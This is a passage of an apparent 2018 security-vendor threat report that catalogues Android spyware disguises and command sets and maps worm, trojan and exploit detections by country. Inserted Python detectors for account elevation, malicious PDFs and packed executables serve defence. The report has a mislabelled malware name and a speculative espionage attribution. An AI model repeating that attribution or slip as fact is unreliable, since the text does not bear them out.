- Records the screen
- Executes shell commands
- Records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

- Takes control over the Bluetooth adapter
- Extracts data about accounts, contact details and installed apps
- Extracts data from the WhatsApp message DB and related keys
- Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version 1 to Version 3: Facebook, Chrome

Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:

- Extract the device information
- Delete SMS
- Set ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
- Extract contact details
- Set Wi-Fi always turned on

Version 2 can execute additional commands:

- Send SMS and read outgoing SMS
- Enable and disable a Wi-Fi connection
- Access a location specified by the attackers
- Make recordings
- Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
Apps and distribution names: FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking Trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player
Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:
- Send_SMS: extract SMS content and send it to the C&C server
- Send_USSD: send the USSD to the C&C server
- Gethistory: monitor browser history
- Start_AllApp: gather info about installed applications
- Send_call: set the Intent action to call
- Forward_call: forward incoming calls
- ResForward_call: reset the call forwarding
- Go_Smsmnd: delete SMS content
- Go_GetAlls: get SMS history
- Dell_sms: delete SMS content in a conversation
- Send_spam: send spam SMS
- Start_Inject: call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

佐川急便, 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

- contacts: get contact details and email ID
- Mute: set action to mute
- Mms: get MMS content
- info: get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly operates on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.
Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس (Zibanevis, a text-styling app), تلگرام ھمھ کاره (all-in-one Telegram), Proxy, دوست یاب (friend finder), Telegram Ton, شارژ رایگان بگیر (get free credit), App Master, Anti Rat, PlatformA, فالورگیر نامحدود (unlimited follower getter), اینترنت رایگان (free Internet)
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity: it steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in a variety of disguises, as listed in the figure.
4.1.11 CoinHive
The last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining potential. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.
Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is that possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that another cybercriminal had earlier infected CoinMiner with CoinHive. So the first attacker is a victim too: a thief robbing a thief.
This story clearly illustrates the state of cybersecurity in Q2: no one can feel totally secure. Even a predator can turn into prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Chart: Android-targeted malware in April 2018
4.2.2 May 2018
Chart: Android-targeted malware in May 2018
4.2.3 June 2018
Chart: Android-targeted malware in June 2018
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm, by far, was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which in 2012 led to the arrest of 10 people by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was DarkComet (or Dark Komet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives, such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to the malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
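The Starter behaviour described above, a new local account that is immediately placed in the Administrators group, leaves a pair of Windows Security events behind: 4720 (user account created) followed by 4732 (member added to a security-enabled local group). The Python below, an added example rather than anything from the report, correlates those two events per host and account within a time window. The event records are constructed JSON lines with the relevant fields flattened and the member name already resolved from its SID (in raw 4732 events the member is usually a SID); the host names, account names and timestamps are invented.

```python
"""Detection logic for the behaviour attributed to the Starter trojan above: a
new local account that is promptly placed in the Administrators group. Added
example, not the report's code; the records below are constructed JSON lines
carrying the fields of Windows Security events 4720 (user account created) and
4732 (member added to a security-enabled local group), with member names
already resolved from SIDs."""
import json
from datetime import datetime, timedelta

# Constructed sample log: WS01 shows the create-then-elevate pattern within
# seconds, WS02 is a help-desk onboarding into a harmless group a day later,
# WS03 promotes an account that already existed (no 4720 on record).
SAMPLE_EVENTS = """\
{"time": "2018-06-02T03:14:07Z", "id": 4720, "host": "WS01", "subject": "SYSTEM", "target": "RemoteSvc"}
{"time": "2018-06-02T03:14:09Z", "id": 4732, "host": "WS01", "subject": "SYSTEM", "group": "Administrators", "member": "remotesvc"}
{"time": "2018-06-02T09:00:00Z", "id": 4720, "host": "WS02", "subject": "helpdesk", "target": "jsmith"}
{"time": "2018-06-03T11:30:00Z", "id": 4732, "host": "WS02", "subject": "helpdesk", "group": "Remote Desktop Users", "member": "jsmith"}
{"time": "2018-06-02T04:00:00Z", "id": 4732, "host": "WS03", "subject": "itadmin", "group": "Administrators", "member": "itops"}
"""

ADMIN_GROUPS = {"administrators", "domain admins"}
ACCOUNT_CREATED, MEMBER_ADDED = 4720, 4732


def parse_events(text: str) -> list:
    """Parse JSON lines into dicts with a real datetime, oldest first."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["time"] = datetime.strptime(ev["time"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(ev)
    return sorted(events, key=lambda e: e["time"])


def find_created_then_elevated(events: list, window: timedelta = timedelta(hours=1)) -> list:
    """Pair each 4732 into an admin group with a 4720 for the same account on
    the same host inside `window`. An existing account being promoted (no 4720
    on record) is deliberately not reported, to keep the rule high-fidelity."""
    created = {}          # (host, account) -> the 4720 event
    alerts = []
    for ev in events:
        if ev["id"] == ACCOUNT_CREATED:
            created[(ev["host"], ev["target"].lower())] = ev
        elif ev["id"] == MEMBER_ADDED and ev["group"].lower() in ADMIN_GROUPS:
            birth = created.get((ev["host"], ev["member"].lower()))
            if birth and timedelta(0) <= ev["time"] - birth["time"] <= window:
                alerts.append({
                    "host": ev["host"],
                    "account": ev["member"],
                    "created_by": birth["subject"],
                    "elevated_by": ev["subject"],
                    "seconds_between": (ev["time"] - birth["time"]).total_seconds(),
                    # A non-interactive creator (SYSTEM) is what a service-level
                    # implant looks like; an admin at a console usually is not.
                    "created_by_system": birth["subject"].upper() == "SYSTEM",
                })
    return alerts


if __name__ == "__main__":
    for alert in find_created_then_elevated(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Account names are compared case-insensitively because 4720 records the name as typed while 4732 may carry it in a different case; the window is kept short on purpose, since legitimate provisioning normally separates creation and group assignment by minutes or longer and goes through an interactive subject rather than SYSTEM.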
5.2.4 Exploits
Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
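Because exploit PDFs rely on the format's active-content features (an action that fires on open, JavaScript, launch actions, embedded files), a first-pass static triage can flag them before any reader parses the file. The Python below is an added example, not the report's code; the PDF bytes it scans are constructed for the demonstration. It handles two evasions the format itself allows, which is what makes a naive string search insufficient: PDF names may be written with #xx hex escapes (so "/Java#53cript" is "/JavaScript"), and objects may sit inside Flate-compressed streams.

```python
"""Static triage of a PDF for the active-content features that exploit
documents typically rely on. Added example, not the report's code; the PDF
bytes below are constructed for the demonstration."""
import re
import zlib

# PDF name tokens that warrant analyst attention when found in a document.
RISKY_NAMES = {"/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
               "/EmbeddedFile", "/RichMedia", "/XFA"}
NAME_TOKEN = re.compile(rb"/[^\s/<>\[\]()]+")
STREAM_BODY = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def decode_pdf_name(token: bytes) -> bytes:
    """Undo the #xx hex escapes the PDF spec allows inside names, so that
    /Java#53cript is recognised as /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), token)


def inflate_streams(data: bytes) -> bytes:
    """Append the inflated contents of every Flate stream so names hidden
    inside compressed objects are scanned as well."""
    extra = []
    for m in STREAM_BODY.finditer(data):
        try:
            extra.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate-encoded or truncated: skip rather than fail
    return data + b"\n" + b"\n".join(extra)


def triage_pdf(data: bytes) -> dict:
    """Count risky names and flag the open-time script combination."""
    if not data.startswith(b"%PDF-"):
        return {"is_pdf": False, "findings": {}, "score": 0, "auto_exec_script": False}
    scan = inflate_streams(data)
    findings = {}
    for token in NAME_TOKEN.findall(scan):
        key = decode_pdf_name(token).decode("latin-1")
        if key in RISKY_NAMES:
            findings[key] = findings.get(key, 0) + 1
    # Something that fires on open plus something that executes is the
    # combination exploit documents use; weight it above the raw count.
    auto = {"/OpenAction", "/AA"} & set(findings)
    script = {"/JavaScript", "/JS", "/Launch"} & set(findings)
    score = len(findings) + (3 if auto and script else 0)
    return {"is_pdf": True, "findings": findings, "score": score,
            "auto_exec_script": bool(auto and script)}


def build_sample_pdf() -> bytes:
    """Constructed sample: an OpenAction whose JavaScript action hides behind a
    #-escaped name inside a Flate-compressed stream. The script only raises an
    alert; the structure, not the payload, is what the triage keys on."""
    hidden = zlib.compress(b"4 0 obj\n<</S/Java#53cript/JS(app.alert(1))>>\nendobj")
    return (b"%PDF-1.7\n"
            b"1 0 obj<</Type/Catalog/Pages 2 0 R/OpenAction 4 0 R>>endobj\n"
            b"2 0 obj<</Type/Pages/Kids[]/Count 0>>endobj\n"
            b"3 0 obj<</Length " + str(len(hidden)).encode() + b"/Filter/FlateDecode>>\nstream\n"
            + hidden + b"\nendstream\nendobj\n"
            b"trailer<</Root 1 0 R>>\n%%EOF\n")


if __name__ == "__main__":
    print(triage_pdf(build_sample_pdf()))
```

A plain `grep -a /JavaScript` misses the sample entirely, once because of the hex escape and once because the object is compressed; the decoded-name and inflated-stream passes are what make the check hold up. Other filters (LZW, ASCIIHex, ASCII85) are not handled here and would need the same treatment in a production scanner.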
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means of obfuscating the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems and leverages an open-source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
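The packing mechanism described above leaves a recognisable shape in a PE file: an empty-on-disk section reserved for the unpacked image, next to a small, very high-entropy section that holds the compressed data and the decompression stub the entry point lands in. Stock UPX also names its sections UPX0/UPX1, but a modified packer such as the MUPX mentioned here is expected to scrub such names, so a check that relies on them alone is weak. The Python below, an added example and not the report's code, parses the COFF and section headers itself and scores both the name-based and the structural indicators. The three executables it examines are constructed in memory (they contain no runnable code): a clean layout, a UPX-style layout, and the same layout with the names scrubbed. The 7.0 entropy threshold and the "two indicators" verdict are assumptions chosen for illustration.

```python
"""Triage a PE file for signs of packing. Added example, not the report's
code; the three sample executables are constructed in memory (they carry no
runnable code) to show what UPX-style and modified-UPX layouts look like to
a parser."""
import hashlib
import math
import struct
from collections import Counter, namedtuple

Section = namedtuple("Section", "name virtual_size virtual_address raw_size data entropy")

# Section names well-known packers leave behind (absent when a modified
# packer renames them, which is why the structural checks below matter).
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata",
                        ".petite", "MPRESS1", "MPRESS2", ".vmp0", ".vmp1"}
HIGH_ENTROPY = 7.0  # bits per byte (assumed threshold); compressed data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant run, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(pe: bytes):
    """Return (sections, entry_point_rva) read from the COFF and section headers."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    (nsec,) = struct.unpack_from("<H", pe, e_lfanew + 6)        # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)   # SizeOfOptionalHeader
    opt = e_lfanew + 24                                          # optional header start
    (entry,) = struct.unpack_from("<I", pe, opt + 16)            # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from(
            "<8sIIII", pe, opt + opt_size + 40 * i)
        data = pe[rawptr:rawptr + rawsize] if rawsize else b""
        sections.append(Section(name.rstrip(b"\0").decode("latin-1"),
                                vsize, vaddr, rawsize, data, shannon_entropy(data)))
    return sections, entry


def triage_pe(pe: bytes) -> dict:
    """Collect packing indicators; two or more is treated as 'likely packed'."""
    sections, entry = parse_pe(pe)
    indicators = []
    for s in sections:
        span = max(s.virtual_size, s.raw_size)
        holds_entry = s.virtual_address <= entry < s.virtual_address + span
        if s.name in PACKER_SECTION_NAMES:
            indicators.append(f"{s.name}: known packer section name")
        if s.raw_size == 0 and s.virtual_size > 0:
            indicators.append(f"{s.name}: empty on disk, {s.virtual_size:#x} bytes in memory (unpack target)")
        if s.entropy > HIGH_ENTROPY:
            indicators.append(f"{s.name}: entropy {s.entropy:.2f}")
            if holds_entry:
                indicators.append(f"{s.name}: entry point inside high-entropy data (decompression stub)")
    return {"indicators": indicators, "likely_packed": len(indicators) >= 2}


def _pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler standing in for compressed code."""
    out, h = bytearray(), b"constructed seed"
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


def build_sample_pe(kind: str) -> bytes:
    """Constructed PE32 image: 'clean', 'upx' (UPX0/UPX1 layout) or 'mupx'
    (same layout with the section names scrubbed, as a modified packer does)."""
    code = b"\x55\x8b\xec\x83\xec\x10\x90\xc3" * 512            # low-entropy stand-in
    if kind == "clean":
        layout = [(b".text", len(code), 0x1000, code), (b".data", 0x200, 0x3000, b"\0" * 0x200)]
        entry = 0x1010
    else:
        names = (b"UPX0", b"UPX1") if kind == "upx" else (b".text", b".rsrc")
        layout = [(names[0], 0x10000, 0x1000, b""), (names[1], 0x2000, 0x11000, _pseudo_random(4096))]
        entry = 0x11100
    # 224-byte PE32 optional header: Magic, then AddressOfEntryPoint at offset 16.
    opt = struct.pack("<H", 0x10B) + b"\0" * 14 + struct.pack("<I", entry) + b"\0" * 204
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, len(opt), 0x102)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)             # e_lfanew = 64
    raw_ptr = 64 + 4 + len(coff) + len(opt) + 40 * len(layout)
    headers, body = b"", b""
    for name, vsize, vaddr, data in layout:
        ptr = raw_ptr + len(body) if data else 0
        headers += struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, len(data), ptr, 0, 0, 0, 0, 0x60000020)
        body += data
    return dos + b"PE\0\0" + coff + opt + headers + body


if __name__ == "__main__":
    for kind in ("clean", "upx", "mupx"):
        print(kind, triage_pe(build_sample_pe(kind)))
```

The "mupx" sample trips none of the name checks yet still scores three structural indicators, which is the point: a renamed packer changes the labels but not the layout it needs in order to work. On real binaries, high entropy alone is not proof of packing (resource sections holding images or certificates are also dense), so the entry-point and empty-section checks are what carry the verdict.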
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" (PUA), this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3, respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
